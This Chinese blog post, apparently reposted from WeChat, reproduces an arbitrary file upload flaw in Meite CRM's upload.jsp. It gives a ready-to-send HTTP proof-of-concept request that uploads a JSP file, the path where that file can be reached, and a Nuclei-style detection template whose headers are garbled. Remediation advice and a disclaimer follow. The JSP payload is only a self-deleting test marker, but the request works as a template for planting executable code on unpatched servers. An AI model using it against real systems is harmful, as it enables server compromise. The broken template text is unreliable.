POC如下所示:POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Content-Length: 693Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: closeContent-Type: multipart/form-data; boundary=----qiioxrvqmpuuubhaotnuUpgrade-Insecure-Requests: 1------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="file"; filename="7ahrf590an.jsp"Content-Type: application/octet-stream<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="key"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="form"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="field"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="filetitile"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="filefolder"null------qiioxrvqmpuuubhaotnu--
链接地址如下所示:url+/userfile/default/userlogo/xxxxx.jsp
id: mt_crm_uploadinfo:name: mt_crm_uploadauthor: recjlseverity: criticaldescription: descriptionreference:https://tags: tagshttp:raw:|-POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: 691Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: gzip, deflate, br: zh-CN,zh;q=0.9: max-age=0Connection: close: multipart/form-data; boundary=----qiioxrvqmpuuubhaotnu: 1------qiioxrvqmpuuubhaotnu: form-data; name="file"; filename="7ahrf590an.jsp": application/octet-streamjava.io.File(application.getRealPath(request.getServletPath())).delete();%>------qiioxrvqmpuuubhaotnu: form-data; name="key"null------qiioxrvqmpuuubhaotnu: form-data; name="form"null------qiioxrvqmpuuubhaotnu: form-data; name="field"null------qiioxrvqmpuuubhaotnu: form-data; name="filetitile"null------qiioxrvqmpuuubhaotnu: form-data; name="filefolder"null------qiioxrvqmpuuubhaotnu--: andmatchers:type: wordpart: bodywords:7ahrf590antype: statusstatus:200
修复建议
1、对上传文件类型进行验证,除在前端验证外在后端依然要做验证,后端可以进行扩展名检测,重命名文件,MIME类型检测以及限制上传文件的大小等限制来防御,或是将上传的文件其他文件存储服务器中。
2、严格限制和校验上传的文件,禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限,防止木马执行。
3、对上传文件格式进行严格校验,防止上传恶意脚本文件;
4、严格限制上传的文件路径。
5、文件扩展名服务端白名单校验。
6、文件内容服务端校验。
7、上传文件重命名。
8、隐藏上传文件路径。
原文始发于微信公众号(爱喝酒烫头的曹操):【1day】美特crm 任意文件上传漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论